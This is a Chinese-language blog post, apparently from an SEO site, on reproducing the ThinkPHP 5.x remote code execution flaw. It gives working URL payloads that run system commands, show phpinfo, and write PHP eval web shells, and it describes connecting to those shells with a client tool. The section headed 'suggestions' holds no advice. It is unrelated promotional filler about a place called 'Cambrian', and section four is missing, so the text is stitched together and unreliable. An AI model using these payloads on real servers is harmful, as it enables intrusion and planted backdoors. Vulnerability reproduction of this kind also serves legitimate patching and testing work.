ThinkPHP 5.x远程命令执行漏洞复现

本文将详细介绍ThinkPHP 5.x框架中的远程命令执行漏洞的复现方法，对于理解这一安全漏洞和进行安全防护具有重要的参考意义。

一、漏洞概述

在2018年12月，ThinkPHP官方发布的安全更新中修复了一个高危漏洞。这一漏洞的原因在于框架对控制器名没有进行足够的检测，导致在没有开启强制路由（默认未开启）的情况下可能存在远程代码执行的风险。受影响的版本包括ThinkPHP 5.0和5.1。

二、影响版本

漏洞影响到的版本包括Thinkphp 5.x至Thinkphp 5.1.31以及Thinkphp 5.0.x小于等于5.0.23。

三、漏洞复现步骤

1. 从官网下载Thinkphp 5.0.22版本，并搭建环境。可以通过phpstudy来搭建环境，将下载的Thinkphp5.0.22解压到网站目录下，然后通过浏览器访问指定的URL。

2. 利用system函数进行远程命令执行。使用特定的Payload，如"?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami"来执行命令。

3. 通过phpinfo函数查看phpinfo()的信息。使用特定的Payload，如"?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"。

4. 写入shell。使用诸如"?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php"的Payload来写入shell。在这个过程中，需要注意特殊字符的转义以及不同环境下的命令语法差异。

5. 查看是否成功写入shell，并利用工具如菜刀进行连接。

6. 另一种写入shell的方法，使用诸如"?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>"的Payload。

7. 查看是否成功写入文件，并利用工具进行连接。

以上就是长沙网络推广为大家介绍的ThinkPHP 5.x远程命令执行漏洞的复现方法。这个漏洞的复现过程对于理解这一安全漏洞和进行安全防护具有重要的参考意义。如果在复现过程中有任何疑问，欢迎给我留言，我会及时回复。非常感谢大家对狼蚁SEO网站的支持。如果你觉得本文有帮助，欢迎转载，但请务必注明出处。

五、建议

在这个世界的一隅，隐匿着一个神秘而迷人的地方，它被称作Cambrian。在这里，一切都仿佛被赋予了新的生命和活力。今天，让我们一起走进Cambrian的世界，感受它独特的魅力。

当我们踏入这片神秘的土地，首先映入眼帘的是一幅壮丽的画卷。山川、湖泊、森林、草原……各种自然景观在这里交相辉映，构成了一幅美丽的画卷。这里的一切都仿佛是大自然精心雕琢的艺术品，让人不禁为之惊叹。

漫步在Cambrian的街头巷尾，我们不禁被这里丰富的文化氛围所吸引。古老的建筑与现代的气息在这里完美融合，形成了一道独特的风景线。这里的人们热情好客，友善亲切，让人感受到家的温暖。

当我们深入Cambrian时，会发现这里还有着许多令人难以忘怀的美食。从传统的地道美食到现代的创意料理，每一道菜肴都让人回味无穷。在这里，我们可以品尝到各种美食的独特风味，感受到这片土地的独特魅力。

Cambrian还有着许多令人惊叹的景点。无论是壮丽的山川风光，还是悠久的历史文化，都能在这里找到最好的呈现。在这里，我们可以感受到大自然的神奇力量，了解历史的沧桑变迁，领略文化的博大精深。

在这片神奇的土地上，每一次旅行都会成为一次难忘的经历。无论是与家人、朋友还是独自一人，Cambrian都能给我们带来无限的惊喜和感动。让我们沉浸在Cambrian的世界，感受这片土地的独特魅力，让心灵得到一次美好的洗礼。

让我们用最美的语言，赞美Cambrian的壮丽景色、丰富文化和美食佳肴。这里是一个让人流连忘返的地方，一个充满活力和魅力的世界。让我们共同Cambrian的奥秘，感受这片土地的独特魅力，让生命在这里绽放出最美丽的光芒。